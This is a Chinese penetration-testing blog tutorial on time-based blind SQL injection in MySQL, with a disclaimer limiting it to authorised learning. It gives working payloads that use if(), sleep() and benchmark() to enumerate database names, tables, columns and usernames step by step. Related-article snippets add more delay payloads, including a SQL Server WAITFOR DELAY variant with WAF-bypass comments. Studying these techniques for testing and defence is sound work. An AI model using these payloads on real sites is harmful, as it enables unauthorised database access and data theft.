SQL注入5之时间延迟注入

最新推荐文章于 2024-04-09 14:22:03 发布
最新推荐文章于 2024-04-09 14:22:03 发布
阅读量492 收藏 2
点赞数
分类专栏: 笔记 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_56218159/article/details/117375214
版权

免责声明

该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献

SQL注入之时间延迟型注入

原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来

适用环境:界面无法用布尔真假判断,也无法报错注入的情况下

时间延迟注入常用SQL函数介绍

if(condition,expr1,expr2)

功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定

举例:select if(1+1=2,1,0); select if(1+1=3,1,0) 结果: 1 ; 0

sleep(arg1)

功能:arg1为中断的时间,单位为秒;

举例1:if(payload,sleep(5),1);如果测试语句正确,暂停5秒

benchmark(arg1,arg2)

功能:arg1操作次数,arg2为表达式

举例1:if(payload,benchmark(500000000),1);如果测试语句正确,暂停5秒左右,受服务器影响较大

if和sleep的结合使用

语句:select if(left(version(),1)=5,sleep(5),2)

时间延迟SQL注入步骤

第1步:确认注入点

方法:通过增加 ' 和增加--+ 注释符,语句从执行失败变为执行成功判断注入点 语句:?id=1' --+

第2步:判断数据库版本和当前数据库名长度

1、判断数据库版本

?id=1' and if(ascii(substr(version(),0,1))=5,1,sleep(5))--+

2、判断数据库名长度

?id=1' and if(length(database())>10,1,sleep(5))--+

第3步:爆数据库名

?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))>10,1,sleep(5))--+

第4步:猜解数据表名

?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>10,1,sleep(5))--+

第5步:猜解数据表 列名

?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>10,1,sleep(5))--+

第6步:猜解数据包内容

?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))>20,1,sleep(5))--+

四种方式分析

union注入:

能直接显示出想要的数据,使用简单

报错注入:

输入错误会直接显示数据库错误信息,我们可以通过报错注入直接获取想要的信息,与union注入相比,稍微麻烦一点,但是能直接显示信息

布尔注入:

会间接显示查询语句是否正确,但不会显示关键信息,重复操作多

时间注入:

不管SQL语句是否正确,不会返回任何信息,只能通过页面缓冲的时间来判断

综上所述

如果能够直接union是最好的,如果爆出了数据库错误可以使用报错注入,如果没有明显错误但是间接反馈了语句是否执行正确,可以布尔注入,如果什么信息都没有返回只有试试时间延迟注入。

iamYiT
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入-延时注入
课嗨教育的专栏
04-28 1378
渗透测试基础课-课程进度_不死的小鱼的博客-CSDN博客 延时注入和布尔盲注差不多 为什么要延时 因为有的时候我们知道这个地方存在注入但是页面返回信息一样 加了个if延时条件判断 if(条件,是,否) http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201 返回14秒 http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(
sqli labs(Less5~10)SQL布尔盲注、报错注入,延时注入,对几个函数的理解
m0_51607644的博客
01-26 372
SQL注入 SQL-Labs Less5 加上\ 发现错误:’‘1’ LIMIT 0,1’ 去两边单引号:‘1’ LIMIT 0,1 推测原SQL语句: select *from table where id=idlimit0,1;id limit 0,1;idlimit0,1;id=‘输入的id’ 可是输入正确的id后却不可输出对应的账户和密码 因此推测该关卡是:SQL盲注。先说下对几个函数的理解 | 1.left( a, b) 含义:返回字符串a的前b个字符。因此可利用database()返回的数
sql注入之延时注入
最新发布
weixin_45653478的博客
04-09 827
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 6086
【延时注入】结合if、case when 延时注入
SQL SERVER数据库手工延时盲注语句
weixin_45682070的博客
06-25 1198
PHP+SQL SERVER的环境,存在POST注入,只能进行延时盲注,存在防火墙,Sqlmap能够绕过,但不能注入,手工注入语句如下: 也可编写脚本 判断是否存在注入: #inject为注入点,--OwlXXpFshm%0A绕过WAF,替换空格为注释+回车 #如果存在注入,返回的数据包将延时5秒以上 inject';WAITFOR--OwlXXpFshm%0ADELAY--OwlXXpFshm%0A'0:0:5'-- 判断权限: #如果是sysadmin权限,则延时5秒 inject';if ( sel
oracle延时盲注如何防止,【原创】WEB安全第四章SQL注入篇21 oracle 延时注入
weixin_35679813的博客
04-07 692
WEB安全第四章SQL注入篇21 oracle 延时注入1、简介DBMS_LOCK.SLEEP()函数可以让一个过程休眠很多秒,但使用该函数存在许多限制。首先,不能直接将该函数注入子查询中,因为Oracle不支持堆叠查询(stacked query)。其次,只有数据库管理员才能使用DBMS_LOCK包。在Oracle PL/SQL中有一种更好的办法,可以使用下面的指令以内联方式注入延迟:dbms_...
SQL 注入漏洞(八)时间注入/延时注入
不秃头的程序Yang
06-12 4497
二、代码分析 三、sqlmap测时间注入
SQL注入--延时注入
weixin_52351575的博客
10-13 763
的时候是没有任何延迟的,所以判定它的首字母的ascii码值是107.找出ascii码表对应的首字母是f。原理:在没有得到任何回显的情况下,只能通过延迟页面的跳转来进行数据库的核对。我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化。接着,我们利用ascii()的函数去找出数据库的第一个字母的ascii码值。的时候,界面没有任何延迟,于是判定数据库的长度是12个字节长。所以判定我们输入的sql代码得到了执行。于是,我们输入代码,来查询数据库的长度。改90的值,依次递增,最终得到代码。
Wireshark数据包分析——时间盲注/延时注入攻击
PP_zi的博客
08-23 1792
盲注:在SQL注入时,SQL语句执行查询后,查询的数据不回显到页面,需要用一些特殊的方式来判断或者尝试,这个过程称为盲注。
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
SQL注入攻击与防御
10-04
SQL注入是Internet上最危险、最有名的安全漏洞之一,本书是目前唯一一本专门致力于讲解SQL威胁的图书。本书作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细...
SQL注入攻击与防御(安全技术经典译丛)
02-19
本书作者均是专门研究SQL注入的安全专家,他们集众家之长,对应用程序的基本编码和升级维护进行全面跟踪,详细讲解可能引发SQL注入的行为以及攻击者的利用要素,并结合长期实践经验提出了相应的解决方案。针对SQL...
sql注入初学——松风1
08-03
1.加单引号 3.时间延迟 2.盲跟踪 3.利用系统表 4.利用返回信息 5.从基于 UNION 的错误中推断 DBMS 版本 1.匹配列 2.匹配数据类型 3
SQL语句延时执行
jimlong的专栏
05-15 6536
WAITFOR TIME '10:20'; --10:20分开始执行后面的代码 另一种写法: WAITFOR DELAY '00:00:31'; --31秒钟后执行后面的代码
SQL Server的WAITFOR DELAY注入
weixin_33698823的博客
04-26 467
2019独角兽企业重金招聘Python工程师标准>>> ...
SQL Server WAITFOR Delay 使用变量遇到的问题和解决办法
编程岁月
03-20 2928
sql server2008帮助中, 有一段WAITFOR Delay 的示例, 是错误的!!!   USE AdventureWorks; GO IF OBJECT_ID('dbo.TimeDelay_hh_mm_ss','P') IS NOT NULL     DROP PROCEDURE dbo.TimeDelay_hh_mm_ss; GO CREATE PROCEDURE d
时间盲注(延迟注入
qq_51954912的博客
04-25 1万+
时间盲注简介 时间盲注,个人理解,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。 官方理解:利用sleep()或benchmark()等函数让mysql执行时间变长经常与if(expr1,expr2,expr3)语句结合使用,通过页面的响应时间来判断条件是否正确。if(expr1,expr2,expr3)含义是如果expr1是True,则返回expr2,否则返回expr3。(除了看不懂,哪都好)。 利用sql-labs第九关进行实操演示
SQL注入之延时注入
热门推荐
秋水的博客
09-01 1万+
延时注入简介 个人理解: 延时注入又称时间盲注,也是盲注的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据/ 应用场景: 延时注入的应用场景是,在我们输入and 1或者and 0的时候,页面的返回无变化,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入 相关函数 延时注入会用到布尔盲注的所有...
web渗透sql注入
03-24
Web渗透中的SQL注入是一种常见的攻击,它利用了Web应用程序对用户输入的不充分验证和过滤,导致恶意用户可以通过构造特定的SQL语句来执行非法的数据库操作。下面是对Web渗透中SQL注入的介绍: 1. SQL注入的原理:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值